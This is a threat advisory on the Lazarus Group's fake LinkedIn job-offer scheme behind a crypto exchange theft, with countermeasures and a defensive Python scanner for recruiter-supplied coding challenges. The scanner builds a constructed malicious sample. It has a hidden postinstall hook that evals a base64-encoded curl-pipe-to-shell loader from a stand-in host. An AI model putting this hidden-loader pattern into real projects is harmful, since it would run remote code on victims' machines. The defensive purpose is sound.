VTA-004501 – Lazarus Group’s LinkedIn Scheme Leads to Major Crypto Theft
In April, the Bahrain-based cryptocurrency exchange Rain.com suffered a security breach that cost it roughly $16 million in cryptocurrency. The attack is attributed to the North Korean state-sponsored group Lazarus, and it began not with an exploit but with social engineering over LinkedIn. Researchers found that Lazarus approached a Rain employee with a fake job offer, kept the conversation going until trust had been built, and then sent a "coding challenge" that carried the TraderTraitor malware. Once the employee ran it, the malware captured the private keys and passwords needed to access Rain's crypto wallets, and those credentials gave the attackers control of the funds.
The FBI, working with Rain, traced part of the stolen funds to WhiteBIT, a cryptocurrency exchange based in Lithuania, where approximately $760,000 worth of SOL was frozen. Lazarus is known for operating a stable of fake LinkedIn profiles posing as recruiters from reputable companies, building rapport over weeks before moving the conversation to WhatsApp, Telegram or Slack, where the malicious payload is delivered away from LinkedIn's own abuse monitoring.
Over the years, Lazarus has been linked to multiple high-value thefts from digital asset providers, amassing hundreds of millions in stolen cryptocurrency, which reports suggest may fund North Korea’s nuclear ambitions. LinkedIn has responded by highlighting its efforts to counter state-sponsored activities and promoting safe job hunting practices on its platform.
Severity:
Medium
Attack Surface:
Messaging, Web Application
Tactics:
Credential Access, Execution, Initial Access
Techniques:
T1192: Spearphishing Link (retired ID, now T1566.002 Phishing: Spearphishing Link; delivery through LinkedIn and chat apps also maps to T1566.003 Spearphishing via Service)
T1204: User Execution
T1056: Input Capture
SuperPRO’s Threat Countermeasures Procedures:
1) Treat unsolicited job offers and "take-home challenges" arriving through LinkedIn or chat apps as untrusted. Verify the recruiter through the claimed company's official channels, not through contact details supplied in the message, before opening anything they send.
2) Educate employees, especially developers and anyone with access to wallet or key infrastructure, about recruitment-themed lures, and give them a no-blame channel to report approaches to the security team.
3) Never run a received coding challenge on a production or privileged workstation. Open it in an isolated VM or sandbox with no access to keys, password managers or corporate credentials, and inspect install hooks and obfuscated code before executing it; note that `npm install` or `pip install` already executes project code.
4) Keep wallet private keys off employee endpoints: store them in hardware-backed or HSM key storage, require multi-signature or multi-party approval for withdrawals, and enforce multi-factor authentication on every path to signing infrastructure.
5) Regularly refresh staff training with current social-engineering tradecraft, including the long-running, trust-building approach seen here rather than only one-shot phishing e-mails.
6) Continuously monitor and audit the controls above, including anomalous withdrawal patterns, with internal or external security experts.
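Countermeasure 3 is only actionable if someone actually inspects the challenge before installing or running it. The script below is an added example, not code from the original advisory, from Rain.com or from any Lazarus analysis. It statically triages a received project directory for the things an attacker-supplied "challenge" needs in order to execute code the moment the target installs it: npm lifecycle hooks, dynamic code evaluation, long base64 blobs (decoded to show what they hide) and hard-coded URLs. The heuristics, file names and the sample repository it builds are constructed for illustration and are not a malware signature.

```python
"""Pre-execution triage of a recruiter-supplied "coding challenge" (added example)."""
import base64
import json
import re
import tempfile
from pathlib import Path

# npm lifecycle scripts that run automatically during `npm install`.
INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
# Dynamic evaluation or process spawning in JavaScript / Python / shell sources.
DYNAMIC_EXEC = re.compile(
    r"\b(eval|exec|execSync|spawn|child_process|subprocess|new Function)\b")
# A quoted base64 run long enough to hide a second-stage loader.
LONG_BASE64 = re.compile(r"['\"]([A-Za-z0-9+/]{80,}={0,2})['\"]")
HTTP_URL = re.compile(r"https?://[^\s'\"]+")
SOURCE_SUFFIXES = {".js", ".cjs", ".mjs", ".ts", ".py", ".sh"}


def _try_decode(blob):
    """Decode a base64 string to ASCII text, or return None if it is not one."""
    try:
        return base64.b64decode(blob, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_repo(root):
    """Return a list of (relative_path, finding) tuples; an empty list means nothing flagged."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel_parts = path.relative_to(root).parts
        rel = "/".join(rel_parts)
        # Hidden directories (other than .git) are a common place to stash payloads.
        if any(part.startswith(".") and part != ".git" for part in rel_parts[:-1]):
            findings.append((rel, "file inside hidden directory"))
        if path.name == "package.json":
            try:
                pkg = json.loads(path.read_text(errors="ignore"))
            except ValueError:
                findings.append((rel, "package.json does not parse"))
                continue
            scripts = pkg.get("scripts", {}) if isinstance(pkg, dict) else {}
            for hook in sorted(INSTALL_HOOKS & set(scripts)):
                findings.append((rel, f"install hook '{hook}' runs: {scripts[hook]}"))
        if path.suffix in SOURCE_SUFFIXES:
            text = path.read_text(errors="ignore")
            if DYNAMIC_EXEC.search(text):
                findings.append((rel, "dynamic code execution or process spawn"))
            for blob in LONG_BASE64.findall(text):
                decoded = _try_decode(blob)
                detail = f"decodes to {decoded[:60]!r}" if decoded else "not decodable as text"
                findings.append((rel, f"long base64 blob, {detail}"))
            for url in HTTP_URL.findall(text):
                findings.append((rel, f"hard-coded URL: {url}"))
    return findings


def build_sample_repo(root):
    """Constructed stand-in for a malicious take-home challenge (not a real sample)."""
    root = Path(root)
    (root / "src").mkdir(parents=True)
    (root / ".config").mkdir()
    # Second stage hidden as base64 so the plain-text source looks harmless.
    stage2 = "require('child_process').execSync('curl -s https://cdn.example.invalid/loader.sh | sh')"
    blob = base64.b64encode(stage2.encode()).decode()
    (root / "package.json").write_text(json.dumps({
        "name": "trading-bot-challenge",
        "scripts": {"postinstall": "node .config/setup.js", "test": "jest"},
    }))
    (root / ".config" / "setup.js").write_text(
        f"eval(Buffer.from('{blob}', 'base64').toString());\n")
    (root / "src" / "orderbook.js").write_text(
        "module.exports = function bestBid(bids) { return Math.max(...bids); };\n")
    return root


def triage_sample():
    """Build the constructed sample in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_repo(build_sample_repo(tmp))


if __name__ == "__main__":
    for rel, finding in triage_sample():
        print(f"{rel}: {finding}")
```

Point `scan_repo()` at the extracted challenge directory before touching `npm install`. On the constructed sample it reports the hidden `.config/` directory, the `postinstall` hook, the `eval` call and the decoded base64 loader, while the legitimate `src/orderbook.js` produces nothing. Any finding means the project runs only in a disposable VM, if at all; a clean result means nothing more than "nothing obvious", since static heuristics are easy to evade, which is why the isolation in countermeasure 3 remains mandatory.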
Contributed by: Syaff